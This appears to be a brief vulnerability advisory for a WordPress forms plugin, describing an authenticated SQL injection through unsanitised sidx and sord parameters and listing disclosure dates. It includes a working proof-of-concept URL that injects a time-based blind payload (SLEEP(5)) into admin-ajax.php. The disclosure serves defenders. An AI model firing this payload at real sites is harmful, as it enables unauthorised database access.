The GET parameters sidx and sord were used in a SQL statement without being sanitised when searching for Forms in the dashboard, leading to an authenticated SQL Injection issues.
https://example.com/wp-admin/admin-ajax.php?mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search%5Btext_like%5D=a&_search=false&nd=1612793797105&rows=10&page=0&sord=desc&sidx=id%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
2021-02-08 (about 2 years ago)
2021-02-08 (about 2 years ago)
2021-02-10 (about 2 years ago)